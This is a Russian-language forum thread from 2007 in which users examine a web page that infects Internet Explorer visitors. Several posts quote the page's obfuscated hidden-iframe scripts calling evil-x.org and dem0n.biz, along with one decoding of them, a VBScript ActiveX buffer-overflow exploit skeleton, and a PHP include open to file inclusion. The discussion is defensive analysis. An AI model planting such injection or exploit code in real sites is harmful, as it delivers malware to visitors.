Открой страничку, получи заразу
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя |
Сообщение |
<< Старые топики Новые топики >> |
|
|
Открой страничку, получи заразу - 2007-08-05 11:11:19.683333
|
|
|
Samid
Сообщений: 926
Оценки: 0
Присоединился: 2004-06-02 04:21:11
|
http://www.zavdv.ru/an2/index.htm Сейчас открыл эту страничку, несмотря не предупреждения гугля что это делать не стоит. Тут же на диске С появился файлик SYSIRT.EXE, который создал процесс D2B.tmp, который в сеть ломанулся, но был обламан. Файл я удалил, но кто знает что это за байда, и не оставила ли она еще следов.
|
|
|
RE: Открой страничку, получи заразу - 2007-08-05 11:34:05.543333
|
|
|
Puparro
Сообщений: 1669
Оценки: 0
Присоединился: 2007-05-04 09:57:18.383333
|
У меня нормально прошло, ничего не появилось.
|
|
|
RE: Открой страничку, получи заразу - 2007-08-05 11:43:04.240000
|
|
|
GROB_T
Сообщений: 349
Оценки: 0
Присоединился: 2007-01-05 02:54:27.330000
|
2 Samid, ты наверное эту страницу ослом додумался открыть
|
|
|
RE: Открой страничку, получи заразу - 2007-08-05 11:45:56.020000
|
|
|
Mahoraz
Сообщений: 2908
Оценки: 30
Присоединился: 2007-03-15 20:51:18.450000
|
Все гладко, без проблем…
|
|
|
RE: Открой страничку, получи заразу - 2007-08-05 11:59:34.330000
|
|
|
Samid
Сообщений: 926
Оценки: 0
Присоединился: 2004-06-02 04:21:11
|
Открывал ослом, паниковал оутпост.
|
|
|
RE: Открой страничку, получи заразу - 2007-08-05 13:19:23.920000
|
|
|
RamMerLabs
Сообщений: 615
Оценки: 0
Присоединился: 2007-04-06 23:05:13.516666
|
ещё одно подтверждение тому, что осёл и M$ - фтопку, опера - рулёZZZ!
|
|
|
RE: Открой страничку, получи заразу - 2007-08-05 13:38:09.106666
|
|
|
Samid
Сообщений: 926
Оценки: 0
Присоединился: 2004-06-02 04:21:11
|
Эта гадость прописалась в реестре. HKEY_USERS\S-1-5-21-1693064241-134796959-548312184-500\Software\Microsoft\Search Assistant\ACMru\5603 Вот тут обраружил запись 000 reg_sz d29.tmp что это за ветка, кто знает? Там еще была ветка, HKEY_USERS\S-1-5-21-1693064241-134796959-548312184-500\Software\Microsoft\Search Assistant\ACMru\5604, в ней был зарегестрирован троян который я случайно у себя запустил, потом сразу убрал вручную, но это было пиру месяцев назад, при установке системы.
|
|
|
RE: Открой страничку, получи заразу - 2007-08-05 14:01:28.533333
|
|
|
Puparro
Сообщений: 1669
Оценки: 0
Присоединился: 2007-05-04 09:57:18.383333
|
Сейчас открыл "ослом" - мгновенно прилетела зараза и начала ломиться на рекламные сайты. Сработала моя личная защита и, с какого-то дуба, вылетел BSOD. SYSIRT.EXE - после перезагрузки я не нашёл, но он был, у меня отметилось. То ли он сам слетел, то защита его его смела. Буду туда заходить ешё раз, надо разобраться.
|
|
|
RE: Открой страничку, получи заразу - 2007-08-06 19:23:55.930000
|
|
|
Yashin
Сообщений: 964
Оценки: 0
Присоединился: 2007-05-09 20:18:01.153333
|
FireFox просто вылитает
|
|
|
RE: Открой страничку, получи заразу - 2007-08-06 19:26:33.620000
|
|
|
Puparro
Сообщений: 1669
Оценки: 0
Присоединился: 2007-05-04 09:57:18.383333
|
quote:
ORIGINAL: Yashin FireFox просто вылитает Через раз. Один раз сам завершился, другой раз - нет. Опера нормально. Осёл - зараза сразу влетает. Код страницы - я подозрительного не смог найти.
|
|
|
RE: Открой страничку, получи заразу - 2007-08-06 20:32:48.610000
|
|
|
madwat
Сообщений: 103
Оценки: 0
Присоединился: 2007-04-20 14:40:20.180000
|
В исходнои тексте посмотрел, сточка интересная: <script type="text/javascript">document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0065\u0076\u0069\u006c\u002d\u0078\u002e\u006f\u0072\u0067\u002f\u0058\u0044\u0053\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0030\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0030\u0020\u0062\u006f\u0072\u0064\u0065\u0072\u003d\u0030\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e')</script> А в конце текста: <Script Language='Javascript'> <!– document.write(unescape('%3C%68%74%6D%6C%3E%3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%64%65%6D%30%6E%2E%62%69%7A%2F%61%64%76%74%64%73%2F%6F%75%74%2E%70%68%70%3F%73%5F%69%64%3D%31%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%22%30%22%20%77%69%64%74%68%3D%22%31%22%20%68%65%69%67%68%74%3D%22%31%22%20%73%63%72%6F%6C%6C%69%6E%67%3D%22%6E%6F%22%20%6E%61%6D%65%3D%63%6F%75%6E%74%65%72%3E%3C%2F%69%66%72%61%6D%65%3E%3C%2F%68%74%6D%6C%3E')); //–> </Script><Script Language='Javascript'> <!– document.write(unescape('%3C%68%74%6D%6C%3E%3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%64%65%6D%30%6E%2E%62%69%7A%2F%61%64%76%74%64%73%2F%6F%75%74%2E%70%68%70%3F%73%5F%69%64%3D%31%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%22%30%22%20%77%69%64%74%68%3D%22%31%22%20%68%65%69%67%68%74%3D%22%31%22%20%73%63%72%6F%6C%6C%69%6E%67%3D%22%6E%6F%22%20%6E%61%6D%65%3D%63%6F%75%6E%74%65%72%3E%3C%2F%69%66%72%61%6D%65%3E%3C%2F%68%74%6D%6C%3E')); //–> </Script><Script Language='Javascript'> <!– document.write(unescape('%3C%68%74%6D%6C%3E%3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%64%65%6D%30%6E%2E%62%69%7A%2F%61%64%76%74%64%73%2F%6F%75%74%2E%70%68%70%3F%73%5F%69%64%3D%31%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%22%30%22%20%77%69%64%74%68%3D%22%31%22%20%68%65%69%67%68%74%3D%22%31%22%20%73%63%72%6F%6C%6C%69%6E%67%3D%22%6E%6F%22%20%6E%61%6D%65%3D%63%6F%75%6E%74%65%72%3E%3C%2F%69%66%72%61%6D%65%3E%3C%2F%68%74%6D%6C%3E')); //–> </Script><Script Language='Javascript'> <!– document.write(unescape('%3C%68%74%6D%6C%3E%3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%64%65%6D%30%6E%2E%62%69%7A%2F%61%64%76%74%64%73%2F%6F%75%74%2E%70%68%70%3F%73%5F%69%64%3D%31%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%22%30%22%20%77%69%64%74%68%3D%22%31%22%20%68%65%69%67%68%74%3D%22%31%22%20%73%63%72%6F%6C%6C%69%6E%67%3D%22%6E%6F%22%20%6E%61%6D%65%3D%63%6F%75%6E%74%65%72%3E%3C%2F%69%66%72%61%6D%65%3E%3C%2F%68%74%6D%6C%3E')); //–> </Script> :D
|
|
|
RE: Открой страничку, получи заразу - 2007-08-06 20:37:59.550000
|
|
|
madwat
Сообщений: 103
Оценки: 0
Присоединился: 2007-04-20 14:40:20.180000
|
И зачем 4 раза один и тот же код вставлять? Умом Россию не понять, Аршином общим не измерять, У ней особенная стать, В Россию нужно просто верить :D
|
|
|
RE: Открой страничку, получи заразу - 2007-08-07 00:01:28.553333
|
|
|
PRO*lamer
Сообщений: 6
Оценки: 0
Присоединился: 2007-07-07 20:32:47.570000
|
Там фрейм на этот сайт http://www.evil-x.org/ :)
|
|
|
RE: Открой страничку, получи заразу - 2007-08-07 00:05:02.840000
|
|
|
Paranoic
Сообщений: 60
Оценки: 0
Присоединился: 2007-04-23 22:23:17.746666
|
%3C%68%74%6D%6C%3E%3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%64%65%6D%30%6E%2E%62%69%7A%2F%61%64%76%74%64%73%2F%6F%75%74%2E%70%68%70%3F%73%5F%69%64%3D%31%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%22%30%22%20%77%69%64%74%68%3D%22%31%22%20%68%65%69%67%68%74%3D%22%31%22%20%73%63%72%6F%6C%6C%69%6E%67%3D%22%6E%6F%22%20%6E%61%6D%65%3D%63%6F%75%6E%74%65%72%3E%3C%2F%69%66%72%61%6D%65%3E%3C%2F%68%74%6D%6C%3E == <html><iframe src=http://dem0n.biz/advtds/out.php?s_id=1 frameborder="0" width="1" height="1" scrolling="no" name=counter></iframe></html> хмм, интересно ресурс http://dem0n.biz даже не открывается (оперой по крайней мере)
|
|
|
RE: Открой страничку, получи заразу - 2007-08-07 00:55:56.623333
|
|
|
vit_ch
Сообщений: 72
Оценки: 0
Присоединился: 2007-02-05 22:01:21.093333
|
не firefox не opera не вызвали проблем, возможно из-и того что я под freebsd :)
|
|
|
RE: Открой страничку, получи заразу - 2007-08-07 03:59:09.066666
|
|
|
blacksun
Сообщений: 2360
Оценки: 0
Присоединился: 2006-09-27 03:05:59.350000
|
Аффтар, ты ссыылочку то убери) а то малоли кто нить "умный" найдецо
|
|
|
RE: Открой страничку, получи заразу - 2007-08-07 05:17:12.846666
|
|
|
Samid
Сообщений: 926
Оценки: 0
Присоединился: 2004-06-02 04:21:11
|
ЗАчем ссылочку убирать? Это тот форуи где большинство с этим делом могут справится.
|
|
|
RE: Открой страничку, получи заразу - 2007-08-07 07:27:56.620000
|
|
|
Mahoraz
Сообщений: 2908
Оценки: 30
Присоединился: 2007-03-15 20:51:18.450000
|
Наоборот, надо по больше таких ссылок, чтоб "умных" таких по меньше было…
|
|
|
RE: Открой страничку, получи заразу - 2007-08-08 14:58:39.563333
|
|
|
JTG
Сообщений: 1189
Оценки: 0
Присоединился: 2007-03-05 11:56:01.993333
|
Интересно, почуме каспер к примеру на это орёт <object classid="clsid:421516C1-3CF8-11D2-952A-00C04FA34F05" id="Chroma"></object> <input language=VBScript onclick=jojo() type=button value="Click here to start Exploit"><script language='vbscript'> Sub jojo buff = String(999999, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAaA") get_EDX = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbbbbbbbbbcccccccccccccddddddddddeee" buff1 = String(999999, "BBBBBBBBBBBBBBBBBBBBBBBBBBBBbb") egg = buff + get_EDX + buff1 + scode Chroma.Color = egg End Sub </script> а если по-человечески <html><body> добавить, перестаёт?
|
|
|
RE: Открой страничку, получи заразу - 2007-08-09 14:55:00.880000
|
|
|
Hormiga
Сообщений: 1
Оценки: 0
Присоединился: 2007-08-09 14:47:37.996666
|
Извиняюсь, но я немного не в тему: Дело в том, что вышеуказанный код я нашел на своем сайте вместо index.php и, уже через яндекс, нашел эту ветку. Я подозреваю что развели меня через инклуд. Вот код инклуда: @$page=$_GET['page'];
if (isset($page)) $page='inc/'.$page.'.html'; else $page='inc/index.html';
@$fok=fopen($page,'r');
if (!$fok) $page='inc/404.html'; else fclose($fok);
...
include($page);
... Вопрос: как это можно было обойти?
|
|
|
RE: Открой страничку, получи заразу - 2007-08-14 23:49:46.796666
|
|
|
Йа_ПеченЬкО
Сообщений: 3
Оценки: 0
Присоединился: 2007-08-14 23:23:03.796666
|
quote:
ORIGINAL: JTG Интересно, почуме каспер к примеру на это орёт buff = String(999999, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAaA") get_EDX = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbbbbbbbbbcccccccccccccddddddddddeee" buff1 = String(999999, "BBBBBBBBBBBBBBBBBBBBBBBBBBBBbb") buffer owerflow.
|
|
|
RE: Открой страничку, получи заразу - 2007-08-17 14:36:38.386666
|
|
|
madwat
Сообщений: 103
Оценки: 0
Присоединился: 2007-04-20 14:40:20.180000
|
догадливый :D
|
|
|
RE: Открой страничку, получи заразу - 2007-08-20 15:00:32.226666
|
|
|
4eef
Сообщений: 149
Оценки: 0
Присоединился: 2007-07-07 11:35:42.300000
|
Kaspersky Internet Security 7.0 The requested URL http://www.zavdv.ru/an2/index.htm is infected with Trojan-Clicker.HTML.IFrame.y virus Opera 9.22, Windows Vista, KIS 7.0 Я В ТАНКЕ :)
|
|
|
RE: Открой страничку, получи заразу - 2007-08-20 15:08:38.476666
|
|
|
JTG
Сообщений: 1189
Оценки: 0
Присоединился: 2007-03-05 11:56:01.993333
|
клёва
|
|
|
|
|